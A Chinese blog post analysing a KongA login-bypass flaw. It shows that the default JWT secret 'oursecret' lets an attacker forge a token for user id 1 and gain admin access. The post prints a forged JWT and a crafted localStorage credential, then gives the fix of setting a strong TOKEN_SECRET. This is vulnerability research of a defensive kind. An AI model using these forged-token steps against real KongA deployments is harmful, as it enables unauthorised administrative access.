KongA 任意用户登录漏洞分析

最新推荐文章于 2024-05-16 14:35:10 发布
最新推荐文章于 2024-05-16 14:35:10 发布
阅读量783 收藏 1
点赞数
文章标签: eclipse java tomcat hibernate sqlite
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/why811/article/details/133384612
版权

KongA 简介

KongA 介绍 KongA 是 Kong 的一个 GUI 工具。GitHub 地址是 https://github.com/pantsel/konga 。 KongA 概述 KongA 带来的一个最大的便利就是可以很好地通过UI观察到现在 Kong 的所有的配置,并且可以对于管理 Kong 节点

漏洞成因

未设置TOKEN_SECRET导致攻击者可以伪造任意用户的token登录后台。

环境搭建

https://blog.csdn.net/qq_28284093/article/details/109611898

正常功能

login路由输入用户名密码登录

代码在https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/services/protocols/local.js#L71

验证用户名密码后会生成一个jwt的token。

https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/controllers/AuthController.js#L294

从上图可以看到仅仅将user.id传入issue函数。

https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/api/services/Token.js#L23

这里是漏洞的关键,如果没有设置TOKEN_SECRET的话,默认是oursecret。所以实战情况下漏洞场景还是存在的。

生成token之后将返回的json串存储在localStorage中作为凭证。

代码在

https://github.com/pantsel/konga/blob/57f40d45108341eb57b7360cd01e8288e619747f/assets/js/app/core/auth/services/AuthService.js#L105

攻击利用

先登录一下,看看localStorage。

ngStorage-credentials对应login路由返回包内容

{"user":{"createdUser":null,"updatedUser":1,"node":{"id":6,"name":"kong","type":"default","kong_admin_url":"http://172.30.0.3:8001","netdata_url":null,"kong_api_key":"","jwt_algorithm":"HS256","jwt_key":null,"jwt_secret":null,"username":"","password":"","kong_version":"2.5.0","health_checks":false,"health_check_details":null,"active":false,"createdAt":"2021-07-16T03:26:11.000Z","updatedAt":"2021-07-16T03:26:11.000Z","createdUser":1,"updatedUser":1},"id":1,"username":"admin","email":"admin@admin.com","firstName":null,"lastName":null,"admin":true,"node_id":"","active":true,"activationToken":"7c15366f-2f45-4d2d-93ed-ad57b03e09ba","createdAt":"2021-07-16T03:21:14.000Z","updatedAt":"2021-07-16T03:26:11.000Z"},"token":"eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo"}

jwt解密一下看看

朴实无华,user.id就是1 。第一个注册用户是1,第二个注册用户是2。因为第一个用户往往是管理员用户,所以实战情况下构造1的jwt即可。

下面构造任意用户的jwt

eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo

构造凭证:

{"user":{"createdUser":null,"updatedUser":1,"node":{"id":1,"name":"admin","type":"default","kong_admin_url":"1","netdata_url":null,"kong_api_key":"","jwt_algorithm":"HS256","jwt_key":null,"jwt_secret":null,"username":"","password":"","kong_version":"2.5.0","health_checks":false,"health_check_details":null,"active":false,"createdAt":"1","updatedAt":"1","createdUser":1,"updatedUser":1},"id":1,"username":"1","email":"qq@qq.com","firstName":null,"lastName":null,"admin":true,"node_id":"","active":true,"activationToken":"1","createdAt":"1","updatedAt":"1"},"token":"eyJhbGciOiJIUzI1NiJ9.MQ.Lu-KcR4aCeuT9hi1K474zV3s4VaopLDCcf4nZvH6DQo"}

修改localStorage成功进入后台。

漏洞修复

部署时设置TOKEN_SECRET且值为不可爆破的字符串即可。

why811
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kong未授权访问漏洞(CVE-2020-11710)复现
锋刃科技的博客
03-05 5500
简介 Kong是开源的、"云原生"(cloud-native)的API Gateway应用程序,使用Kong gateway的各种插件可实现对访问流量的精细控制、访问鉴权。 影响版本 Kong :< V2.0.3 环境搭建 使用docker进行搭建 创建Docker网络 拉取并启动PostgreSQL容器 docker run -d --name kong-database \ --network=kong-net \...
konga0.14.9镜像
04-14
konga0.14.9镜像
konga-0.14.9
11-22
konga-0.14.9
kongkonga完整安装包(linux)
02-26
安装方法:https://blog.csdn.net/qq_14999375/article/details/129228919 kong&konga完整安装包,包含文件: - kong - konga(已编译) - postgreSQL12.2 - node14
konga在linux环境下的安装包
03-12
在linux下部署konga需要进行多种环境的搭建并进行源码下载,易出错,该安装包适用在linux环境下直接安装
应用程序-特定 权限设置并未向在应用程序容器
weixin_44269952的博客
08-30 8636
当日志出现下图所示的错误时 通过以下方式可以解决 1、进入注册表编辑器 1.1通过搜索查询{8BC3F05E-D86B-11D0-A075-00C04FB68820},找到位置右键修改权限。 1.2点击您当前的账户,勾选完全控制,如果无法应用,点击高级,左上角所有者点击更改,输入您的当前账号,点击检测名称后点确定,然后再设置完全控制。 2、进入组件服务 win+x打开控制面板,在右上角输入...
自动登陆已失败多次,30分钟内请手动登陆
weixin_34044273的博客
12-19 182
远程登陆跳板机时,该电脑未加入域,遇到报错:自动登陆已失败多次,30分钟内请手动登陆 本地登陆正常。 解决办法:卸载跳板机上的360安全卫士,恢复正常。 转载于:https://www.cnblogs.com/wenshuifan/p/8063842.html...
kong网关启用jwt认证插件
zhangshenglu1的博客
05-30 872
认证流程:1、创建一个用户2、生成jwt的所需要的key和密钥3、在https://jwt.io/的生成jwt token4、启用jwt插件5、发送请求的时候携带jwt的token信息官方指导:https://docs.konghq.com/hub/kong-inc/jwt/configuration/examples/
CVE-2020-11710: Kong API网关未授权漏洞通告
爱国小白帽
04-16 3949
CVE-2020-11710: Kong API网关未授权漏洞通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月16日, 360CERT监测发现 业内安全厂商 发布了 Kong Admin Restful API网关未授权漏洞 的风险通告,该漏洞编号为 CVE-2020-11710,漏洞等级:高危。 Kong API 网...
1 kong2.1.0, konga0.14.9, postgresql96, centos7.5.1804 安装
badboy_fzk的博客
07-30 480
环境准备, centos7.5, 虚拟机或docker镜像都可, 我是在docker镜像里做的.安装包全了, 都在下面, 如果想傻瓜式安装, 执行本篇全部命令即可成功启动kong, konga, pgsql. 非docker的话就挑挑干货命令 链接: https://pan.baidu.com/s/1s5SRVjVIt0u9WcTfpAE_dg 密码: abfa 安装包内软件版本,kong2.1.0, konga0.14.9, postgresql96, centos7.5.1804, node..
微服务网关搭建(podman+kong+konga)
lixinyiabc123的专栏
06-30 590
搭建基于kong的微服务网关,采用docker镜像形式,优化http-log插件,获取请求和响应报文内容. 本文仅记录本人搭建该服务的方法,避免后期遗忘. 参考众多博客和官网技术文档,不一一列举!
konga-master.zip
04-17
KONG网关 — KongA管理UI使用 konga-master 未kong 界面化开源代码 konga,详情可以查看kong
关于Kong 网关的研究---详尽版--个人原创
qq_34560135的博客
06-10 3610
kong网关的学习与调研
如何提高自己代码的安全性?
深耕安全技术研究
03-20 1002
编码安全技巧: 请点击链接.
四、利用kongA进行限流
qq_23695889的博客
08-25 1484
接口限流是一个非常常见的事情。 1、选择baidu这个router 2、继续添加plugin 3、选择流量控制 4、设置流量控制条件,方便演示,我这里设置为每分钟2个。 可以看见router下已经有2个plugin了 查看数据库 6、进行验证 第一次提示登陆 第二次限流 ...
att&ck环境搭建
小小鱼的博客
04-22 1291
github地址: https://github.com/mitre-attack/attack-navigator 下载最新的版本: 将压缩包解压到自己的目录,进入到源码包目录的nav-app目录,执行安装命令 npm install: 命令执行完成后,安装ng:npm install -g @angular/cli 安装成功后,执行ng serve命令尝试启动服务: 服务启动成功,默认绑定到4200端口,打开浏览器访问http://localhost:4200,选择创建企业安全的
Konga 安装
TrustNature
08-23 2075
konga支持两种方式部署分别是docker和nodejs原生部署。下面介绍 nodejs 原生安装方法: 仓库地址:https://github.com/pantsel/konga 前提 nodejs 和 postgres 安装完毕。 一、数据库设置 konga 使用数据库 Postgres 作为存储。 postgresql安装完成之后: 首先登录进postgresql交互控制台,然后执行下面...
未受保护的 Kong Gateway Admin API 接口
voctor2436的博客
04-28 198
对 Admin API 的请求可以发送到集群中的任何节点,Kong 将在所有节点上保持配置一致。如果 Admin API 必须在 localhost 接口之外公开,根据网络安全参考,需要尽可能的限制网络层的访问,考虑到Kong只监听一些私有网络接口,所以可以将访问权限控制在小的 IP 集合内,这种情况下,基于主机的防火墙(iptables)在限制范围性的流入流量很有帮助。如果更改此值,确保将监听范围保持在最低限度,以避免将 Admin API 暴露给第三方,这将严重损害整个集群的安全性。
IDEA与eclipse都提供了hashcode()与equals()重写,什么是hashcode
最新发布
chenyu_Yang的博客
05-16 288
注意:自动生成这些方法时,IDE 会尽量遵循 equals() 和 hashCode() 方法的通用约定,但最好还是手动检查生成的代码,以确保它满足你的具体需求。IntelliJ IDEA 和 Eclipse 这样的集成开发环境(IDE)都提供了自动生成 equals() 和 hashCode() 方法的功能,这极大地简化了编码工作,并确保了这两个关键方法的一致性。IntelliJ IDEA 会自动分析你的类,并提示你选择哪些字段应该包含在 equals() 和 hashCode() 方法的比较中。
linux安装konga
12-30
Konga是一个基于Kong的用户友好的控制台管理工具,可以用来管理Kong的API和插件。要在Linux系统上安装Konga,首先需要确保系统上已经安装了Node.js和npm包管理器。接下来,可以通过npm全局安装Konga的包,使用以下命令:`npm install -g konga`。 安装完成后,可以通过命令行启动Konga:`konga start`。接着,可以在浏览器中输入`http://localhost:1337`来访问Konga的web界面。在界面上,可以配置Konga连接到Kong的地址,以便Konga可以管理Kong的API和插件。配置完成后,就可以在Konga中进行API和插件的管理操作了。 在安装和配置Konga过程中,需要确保系统上有合适的权限和依赖,以便Konga可以正常运行。此外,还可以根据实际需求将Konga集成到现有的系统中,以便更方便地管理Kong的API和插件。 总之,在Linux系统上安装Konga,需要先安装Node.js和npm包管理器,然后通过npm安装Konga的包,最后进行配置和启动即可。安装和配置的过程可能会根据具体的系统环境和需求有所不同,但以上步骤可以作为一般的指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值